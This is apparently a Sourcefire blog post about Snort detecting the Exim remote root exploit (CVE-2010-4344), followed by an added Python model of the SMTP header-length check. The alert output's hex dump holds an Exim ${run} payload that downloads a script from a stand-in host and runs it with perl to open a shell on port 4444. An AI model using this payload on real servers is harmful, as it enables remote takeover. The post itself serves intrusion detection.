Tuesday, December 14, 2010

Exim Remote Root

We've heard from a number of Sourcefire customers and open-source Snort users lately, asking us whether we'll be releasing coverage for last week's Exim remote root (CVE-2010-4344 for those keeping score at home). Based on what hit the Exim-dev mailing list, we felt confident that the SMTP preprocessor would catch the vulnerability; after testing with the proof-of-concept sent to the Full-Disclosure mailing list on Saturday, we've confirmed that SID 124:2:1 does the job nicely:

# ~/snort-2.9.0$ src/snort -c etc/snort.2900.conf -q -A cmg -r ~/pcaps/cve-2010-4344-full-disclosure.pcap
12/14-09:15:37.145472  [**] [124:2:1] (smtp) Attempted data header buffer overflow: 2896 chars [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.1.11.11:35781 -> 10.1.11.111:25
Stream reassembled packet
12/14-09:15:37.145472 00:0D:57:C7:22:C7 -> A4:BA:DC:19:DD:5F type:0x800 len:0xB92
10.1.11.11:35781 -> 10.1.11.111:25 TCP TTL:64 TOS:0x0 ID:47277 IpLen:20 DgmLen:2948 DF
***A**** Seq: 0xAFFD7BE6  Ack: 0x16168E70  Win: 0x7140  TcpLen: 32
20 2F 74 6D 70 2F 63 2E 70 6C 20 31 30 2E 31 2E   /tmp/c.pl 10.1.
31 31 2E 31 31 20 34 34 34 34 3B 27 7D 7D 20 24  11.11 4444;'}} $
7B 72 75 6E 7B 2F 62 69 6E 2F 73 68 20 2D 63 20  {run{/bin/sh -c
27 77 67 65 74 20 68 74 74 70 3A 2F 2F 77 77 77  'wget http://www
2E 65 78 61 6D 70 6C 65 2E 63 6F 6D 2F 73 68 65  .example.com/she
6C 6C 2E 74 78 74 20 2D 4F 20 2F 74 6D 70 2F 63  ll.txt -O /tmp/c
2E 70 6C 3B 70 65 72 6C 20 2F 74 6D 70 2F 63 2E  .pl;perl /tmp/c.
70 6C 20 31 30 2E 31 2E 31 31 2E 31 31 20 34 34  pl 10.1.11.11 44
34 34 3B 27 7D 7D 20 24 7B 72 75 6E 7B 2F 62 69  44;'}} ${run{/bi
...
No configuration is necessary; the default settings for the SMTP preprocessor will work here. For anyone who may have tweaked their config, ensure that the max_header_line_len is set to 2000 bytes or less (a reasonable value for all but the most unique of environments; the default value is 1000 bytes).
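To make the detection point concrete, here is an added Python model of the check behind SID 124:2 (this is illustrative code, not Snort's source), run over constructed SMTP DATA samples; the 2896-character header line mirrors the length reported in the alert above, and the assumption that folded header lines are measured per physical line is mine:

```python
"""Added example (not Snort's source): a model of the SMTP preprocessor
check behind SID 124:2, run over constructed SMTP DATA samples."""

SNORT_DEFAULT_MAX_HEADER_LINE_LEN = 1000  # default quoted in the post
RECOMMENDED_CEILING = 2000                # upper bound the post recommends
POC_HEADER_LINE_LEN = 2896                # length reported in the alert above


def data_header_overflow_alerts(data_section, max_header_line_len=SNORT_DEFAULT_MAX_HEADER_LINE_LEN):
    """Return (line_number, length) for each over-long header line.

    data_section is the client payload following the DATA command, CRLF
    delimited. Only the header block (before the first empty line) is
    measured, matching the 'data header' wording of the alert; each physical
    line is counted on its own (assumption: folded lines are not joined).
    In snort.conf the equivalent knob is the max_header_line_len option of
    the smtp preprocessor.
    """
    alerts = []
    for number, line in enumerate(data_section.split(b"\r\n"), start=1):
        if line == b"":
            break  # blank line ends the headers; body lines are out of scope here
        if len(line) > max_header_line_len:
            alerts.append((number, len(line)))
    return alerts


def build_message(first_header_line_len):
    """Construct a DATA section whose first header line has exactly the given
    length (CRLF excluded); the remaining headers and body are benign filler."""
    prefix = b"X-Test-Header: "
    filler = b"A" * max(0, first_header_line_len - len(prefix))
    lines = [prefix + filler, b"From: alice@example.com", b"To: bob@example.com",
             b"Subject: test", b"", b"body text", b"."]
    return b"\r\n".join(lines) + b"\r\n"


def catches_poc_length(max_header_line_len):
    """True when a 2896-character header line, as in the alert, would fire."""
    return bool(data_header_overflow_alerts(build_message(POC_HEADER_LINE_LEN), max_header_line_len))


if __name__ == "__main__":
    # Shows why the post caps max_header_line_len at 2000: raise it past the
    # observed line length and the alert no longer fires.
    for setting in (SNORT_DEFAULT_MAX_HEADER_LINE_LEN, RECOMMENDED_CEILING, 5000):
        print(f"max_header_line_len {setting}: "
              f"{'alert' if catches_poc_length(setting) else 'MISSED'}")
```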